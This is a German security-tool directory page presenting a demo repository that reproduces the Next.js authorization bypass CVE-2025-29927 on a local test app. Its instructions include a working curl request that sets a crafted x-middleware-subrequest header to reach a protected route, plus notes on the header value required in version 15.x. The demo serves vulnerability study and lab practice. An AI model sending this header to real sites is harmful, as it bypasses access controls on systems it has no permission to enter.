Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-29927-demo — Dies ist eine Demo zur Reproduktion der Autorisierungs-Bypass-Schwachstelle CVE-2025-29927 in Next.js. | Kitploit
Tools/GitHubGitHub/t3tra-dev/cve-2025-29927-demo
Authentifizierung & AutorisierungSchwachstellenanalyseWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHubt3tra-dev/cve-2025-29927-demo

cve-2025-29927-demo

Dies ist eine Demo zur Reproduktion der Autorisierungs-Bypass-Schwachstelle CVE-2025-29927 in Next.js.

Repository anzeigen
4vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

cve-2025-29927-demo

Eine Demo zur Reproduktion der Autorisierungs-Bypass-Schwachstelle in Next.js.

Details zu dieser Schwachstelle finden Sie unter Zusammenfassung der Next.js-Schwachstelle CVE-2025-29927.

Reproduktion der Schwachstelle

  1. Klonen Sie dieses Repository.
root@kitploit:~
git clone https://github.com/t3tra-dev/cve-2025-29927-demo.git
cd cve-2025-29927-demo
git pull origin main
  1. Starten Sie den Server.
root@kitploit:~
npm install
npm run dev
  1. Senden Sie eine Anfrage mit dem x-middleware-subrequest-Header, z. B. mit curl.
root@kitploit:~
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/protected

Dadurch wird der Autorisierungs-Bypass ausgelöst und die Seite /protected wird zugänglich.

Der Wert von middleware ist der Name der Middleware, den Next.js erkennt. In dieser Demo-App existiert eine Middleware mit dem Namen middleware. Durch die Angabe dieses Werts wird der Autorisierungs-Bypass ausgelöst.

[!TIP] Bei Next.js 15.x ist MAX_RECURSION_DEPTH auf 5 gesetzt, daher muss der Middleware-Wert mindestens fünfmal durch : getrennt wiederholt werden. Bei älteren Versionen (14.x) genügte einfach „middleware“. Da in dieser Demo-App Next.js 15.2.2 verwendet wird, ist ein solcher Wert erforderlich.

Tool herunterladen